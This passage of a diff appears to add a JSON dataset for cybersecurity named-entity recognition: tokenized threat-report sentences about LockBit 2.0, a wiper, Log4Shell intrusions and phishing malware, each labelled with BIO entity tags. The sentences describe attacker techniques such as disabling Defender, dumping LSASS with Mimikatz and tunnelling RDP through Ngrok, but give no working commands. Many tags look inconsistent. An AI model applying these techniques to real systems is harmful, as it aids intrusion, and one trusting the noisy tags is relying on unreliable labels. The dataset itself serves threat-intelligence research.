"such", + "as", + "logs", + "in", + "Windows", + "Event", + "Logs", + "or", + "malicious", + "files,", + "are", + "typically", + "removed", + "using", + "wevtutil,", + "a", + "batch", + "script,", + "or", + "CCleaner." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Windows", + "Defender,", + "other", + "anti-malware", + "solutions", + "and", + "monitoring", + "tools", + "are", + "disabled", + "utilizing", + "a", + "process", + "explorer", + "tool," + ], + "ner_tags": [ + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Firewall", + "rules", + "have", + "occasionally", + "been", + "seen", + "being", + "disabled", + "as", + "well." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "defense", + "evasion", + "phase,", + "anti-malware", + "and", + "monitoring", + "software", + "is", + "often", + "disabled." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz", + "is", + "a", + "key", + "player", + "in", + "dumping", + "credentials", + "but", + "LockBit", + "2.0", + "has", + "been", + "occasionally", + "seen", + "utilizing", + "MiniDump", + "as", + "well." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "been", + "seen", + "using", + "the", + "PowerShell", + "module", + "InvokeGPUpdate", + "to", + "update", + "the", + "group", + "policy." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Most", + "PowerShell", + "scripts", + "involved", + "in", + "LockBit", + "2.0", + "cases", + "are", + "Base64", + "encoded." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "enumerates", + "system", + "information", + "such", + "as", + "hostname,", + "shares,", + "and", + "domain", + "information." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "been", + "known", + "to", + "self-propagate", + "via", + "SMB." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "a", + "method", + "of", + "lateral", + "movement", + "and", + "a", + "tool", + "for", + "downloading/executing", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "AnyDesk", + "has", + "been", + "the", + "most", + "common", + "legitimate", + "desktop", + "software", + "used", + "to", + "establish", + "an", + "interactive", + "command", + "and", + "control", + "channel,", + "with", + "ConnectWise", + "seen", + "slightly", + "less", + "frequently." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Operates", + "as", + "a", + "file", + "grabber" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "UPX", + "packed", + "sample" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "unpacks" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "brute", + "forcing", + "post-infection", + "to", + "automate", + "local", + "and", + "global", + "spreading", + "attempts." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "brute", + "forcing" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "multiple", + "levels", + "of", + "encoded", + "commands," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "multiple", + "levels", + "of", + "Base64", + "encoding" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "of", + "three", + "base64", + "encoded", + "echo", + "commands" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encoded", + "payload" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "downloading", + "itself", + "from", + "malicious", + "servers" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attacker", + "began", + "adding", + "the", + "lwp-download", + "command", + "as", + "a", + "failover", + "for", + "wget", + "and", + "curl", + "to", + "enable", + "downloading", + "commands" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download,", + "and", + "configure" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "process", + "of", + "downloading", + "and", + "setting", + "persistence", + "of", + "some", + "other", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloading", + "a", + "specific", + "payload" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decoded", + "into", + "a", + "new", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "payload", + "contains", + "two", + "additional", + "base64", + "encoded", + "scripts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "operators", + "attempted", + "to", + "use", + "cached", + "credentials", + "from", + "local", + "accounts", + "to", + "gain", + "initial", + "access", + "to", + "additional", + "systems", + "within", + "an", + "internal", + "network." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exploits", + "known", + "vulnerabilities", + "in", + "internet-facing", + "applications" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MiniDump,", + "“a", + "C#", + "implementation", + "of", + "mimikatz/pypykatz", + "minidump", + "functionality", + "to", + "get", + "credentials", + "from", + "LSASS", + "dumps”" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Usernames" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "and", + "hostnames", + "collected" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "is", + "used", + "to", + "connect", + "to", + "systems", + "in", + "the", + "same", + "network", + "via", + "SMB,", + "to", + "write", + "a", + "batch", + "file", + "to", + "disk" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "push", + "batch", + "files", + "over", + "SMB", + "to", + "other", + "systems", + "within", + "an", + "internal", + "network." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "write", + "a", + "batch", + "file", + "to", + "disk", + "that", + "executes", + "the", + "Fantasy", + "wiper,", + "and", + "then", + "run", + "that", + "batch", + "file", + "via", + "PsExec", + "with", + "this", + "command", + "line", + "string" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "writing", + "the", + "batch", + "file", + "to", + "disk", + "and", + "executing." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "another", + "batch", + "file,", + "system.bat," + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "B-SamFile" + ] + }, + { + "tokens": [ + "writes", + "another", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "batch", + "file", + "in", + "Figure", + "7,", + "which", + "Sandals", + "creates", + "on", + "remote", + "systems", + "to", + "launch" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "both", + "use", + "batch", + "files", + "that", + "run", + "via", + "the", + "Windows", + "command", + "shell." + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ease", + "of", + "batch", + "file", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "write", + "the", + "batch", + "file", + "on", + "the", + "remote", + "system." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "writes", + "a", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "lists", + "the", + "command", + "line", + "arguments", + "accepted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deletes", + "all", + "files", + "written", + "to", + "disk", + "in", + "the", + "current", + "working", + "directory" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "deletes", + "the", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deletes", + "the", + "directory", + "with", + "the", + "files", + "causing", + "the", + "errors" + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "recursively", + "deletes", + "all", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "file", + "deletion", + "functions" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "File", + "deletion", + "functions" + ], + "ner_tags": [ + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "File", + "deletion", + "functions" + ], + "ner_tags": [ + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "then", + "deletes", + "the", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decoded", + "command", + "line", + "parameter" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "base64", + "string" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "base64-encoded", + "argument" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "base64", + "encoded", + "argument" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "collects", + "a", + "list", + "of", + "fixed", + "drives", + "but", + "excludes", + "the", + "drive", + "where", + "the", + "%WINDOWS%", + "directory", + "exists." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Then", + "it", + "enters", + "a", + "for", + "loop", + "iterating", + "over", + "the", + "drive", + "list", + "to", + "build", + "a", + "recursive", + "directory", + "listing" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "shows", + "that", + "the", + "directory", + "listing", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Directory", + "listing", + "functions" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + ",", + "the", + "GetSubDirectoryFileListRecursive", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Recursive", + "directory", + "listing", + "functions" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "then", + "self-deletes." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "bat", + "deletes", + "itself" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attempts", + "to", + "clear", + "file", + "system", + "cache", + "memory,", + "and", + "self-deletes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "that", + "deletes", + "the", + "Fantasy", + "wiper", + "from", + "disk", + "and", + "then", + "deletes", + "itself." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "a", + "batch", + "file", + "in", + "%WINDOWS%\\Temp", + "called", + "registry.bat." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "deletes", + "the", + "following", + "registry", + "keys:", + "HKCR\\.EXE", + "HKCR\\.dll", + "HKCR\\*" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Then", + "it", + "runs", + "the", + "following", + "to", + "attempt", + "to", + "clear", + "file", + "system", + "cache", + "memory:", + "%windir%\\system32\\rundll32.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "GetSubDirectoryFileListRecursive", + "function" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "uses", + "the", + "LookupPrivilegeValue", + "and", + "AdjustTokenPrivilege", + "APIs" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "operators", + "attempted", + "to", + "capture", + "cached", + "credentials", + "and", + "then", + "use", + "them", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "used", + "built-in", + "Windows", + "user", + "account", + "DefaultAccount." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "the", + "built-in", + "Windows", + "user", + "account", + "[T1078.001]", + "to", + "move", + "laterally" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTPS", + "activity", + "from", + "IP", + "address", + "to", + "the", + "organization’s", + "VMware", + "server." + ], + "ner_tags": [ + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Following", + "HTTPS", + "activity," + ], + "ner_tags": [ + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "outgoing", + "HTTPS", + "port", + "443", + "connections", + "to", + "and", + "(the", + "prior", + "domain", + "in", + "reverse)." + ], + "ner_tags": [ + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encoded", + "payload" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "download", + "next", + "stage", + "and", + "execute", + "it\"" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "downloaded", + "malware", + "and", + "multiple", + "tools", + "to", + "the", + "network,", + "including", + "PsExec,", + "Mimikatz,", + "and", + "Ngrok." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "exclusion", + "rule", + "allowlisted", + "the", + "entire", + ",", + "enabling", + "threat", + "actors", + "to", + "download", + "tools", + "to", + "the", + "without", + "virus", + "scans." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "that", + "added", + "an", + "exclusion", + "rule", + "to", + "Windows", + "Defender" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "actors", + "manually", + "disabled", + "Windows", + "Defender", + "via", + "the", + "Graphical", + "User", + "Interface", + "(GUI)" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "added", + "an", + "exclusion", + "rule", + "to", + "Windows", + "Defender." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "The", + "tool", + "allowlisted", + "the", + "entire", + "c:\\drive,", + "enabling", + "the", + "actors", + "to", + "bypass", + "virus", + "scans", + "for", + "tools", + "they", + "downloaded", + "to", + "the", + "c:\\drive." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "manually", + "disabled", + "Windows", + "Defender", + "via", + "the", + "GUI." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "also", + "moved", + "laterally", + "to", + "the", + "domain", + "controller,", + "compromised", + "credentials," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "the", + "actors", + "gained", + "access", + "to", + "a", + "VMware", + "service", + "account", + "with", + "administrator", + "and", + "system", + "level", + "access" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "February", + "2022,", + "the", + "threat", + "actors", + "exploited", + "Log4Shell", + "[T1190]", + "for", + "initial", + "access" + ], + "ner_tags": [ + "O", + "I-Time", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "exploited", + "Log4Shell", + "for", + "initial", + "access", + "to", + "the", + "organization’s", + "VMware", + "Horizon", + "server." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "exploit", + "payload", + "created", + "a", + "Scheduled", + "Task" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Scheduled", + "Task", + "was", + "named", + "to", + "masquerade", + "as", + "a", + "legitimate", + "Windows", + "task." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors’", + "exploit", + "payload", + "created", + "Scheduled", + "Task", + "RuntimeBrokerService.exe,", + "which", + "executed", + "RuntimeBroker.exe", + "daily", + "as", + "SYSTEM." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "actors", + "used", + "RDP" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "actors", + "leveraged", + "RDP", + "to", + "propagate", + "to", + "several", + "hosts", + "within", + "the", + "network." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "were", + "able", + "to", + "proxy", + "[T1090]", + "RDP", + "sessions," + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "used", + "RDP", + "to", + "move", + "laterally", + "to", + "multiple", + "hosts", + "on", + "the", + "network." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "Ngrok", + "to", + "proxy", + "RDP", + "connections", + "and", + "to", + "perform", + "command", + "and", + "control." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "reverse", + "proxy", + "tool", + "for", + "proxying", + "an", + "internal", + "service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz", + "–", + "a", + "credential", + "theft", + "tool." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "then", + "executed", + "Mimikatz", + "on", + "VDI-KMS", + "to", + "harvest", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Additionally,", + "the", + "threat", + "actor", + "was", + "observed", + "attempting", + "to", + "dump", + "the", + "Local", + "Security", + "Authority", + "Subsystem", + "Service", + "(LSASS)", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "used", + "Mimikatz" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "actors", + "were", + "observed", + "trying", + "to", + "dump", + "LSASS", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "used", + "Mimikatz", + "to", + "harvest", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "were", + "able", + "to", + "proxy" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "used", + "Ngrok", + "to", + "proxy" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "removed", + "malicious", + "file", + "mde.ps1", + "from", + "the", + "dis." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "executed,", + "mde.ps1", + "downloaded", + "from", + "and", + "removed", + "from", + "the", + "disk" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "send", + "phishing", + "emails", + "with", + "malicious", + "HTML", + "attachments", + "to", + "all", + "addresses", + "in", + "the", + "victim’s", + "mailbox." + ], + "ner_tags": [ + "O", + "B-Way", + "I-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sending", + "additional", + "phishing", + "emails", + "to", + "the", + "victim’s", + "contacts" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "phishing", + "email" + ], + "ner_tags": [ + "B-Way", + "I-Way" + ] + }, + { + "tokens": [ + "starts", + "with", + "an", + "income", + "tax-themed", + "phishing", + "email", + "written", + "in", + "Spanish,", + "disguising", + "itself", + "as", + "a", + "tax", + "receipt", + "notification" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "disseminate", + "additional", + "phishing", + "emails", + "to", + "the", + "victim’s", + "contacts." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "send", + "phishing", + "emails", + "with", + "malicious", + "HTML", + "attachments", + "to", + "all", + "addresses", + "in", + "the", + "victim’s", + "mailbox." + ], + "ner_tags": [ + "O", + "B-Way", + "I-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "constructs", + "an", + "email", + "with", + "a", + "hardcoded", + "subject", + "and", + "body", + "and", + "attaches", + "the", + "HTML", + "file", + "from", + "the", + "“fb”", + "folder." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "collect", + "the", + "victim’s", + "login", + "credentials", + "for", + "various", + "online", + "accounts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "login", + "credentials" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "targets", + "victim’s", + "login", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "credentials" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "attempt", + "to", + "compromise", + "the", + "victim’s", + "login", + "credentials", + "for", + "webmail", + "services" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "keystrokes" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "keylogging," + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "logs", + "keystrokes" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "logging", + "keystrokes", + "via", + "polling", + "and", + "application", + "hooks" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "logging", + "keystrokes" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "operating", + "system", + "information" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "system", + "information," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "performs", + "surveillance", + "on", + "the", + "victim’s", + "machine", + "by", + "collecting", + "system", + "information", + "such", + "as", + "hostnames,", + "IPv4", + "address,", + "operating", + "system", + "version,", + "disk", + "volume", + "information,", + "disk", + "size", + "and", + "anti-virus", + "software", + "information,", + "and", + "gets", + "the", + "system’s", + "default", + "language." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "multiple", + "hosts,", + "including", + "an", + "Amazon", + "Web", + "Services", + "(AWS)", + "Elastic", + "Compute", + "Cloud", + "(EC2)", + "instance,", + "accessed", + "through", + "its", + "public", + "URL,", + "to", + "host", + "the", + "malicious", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 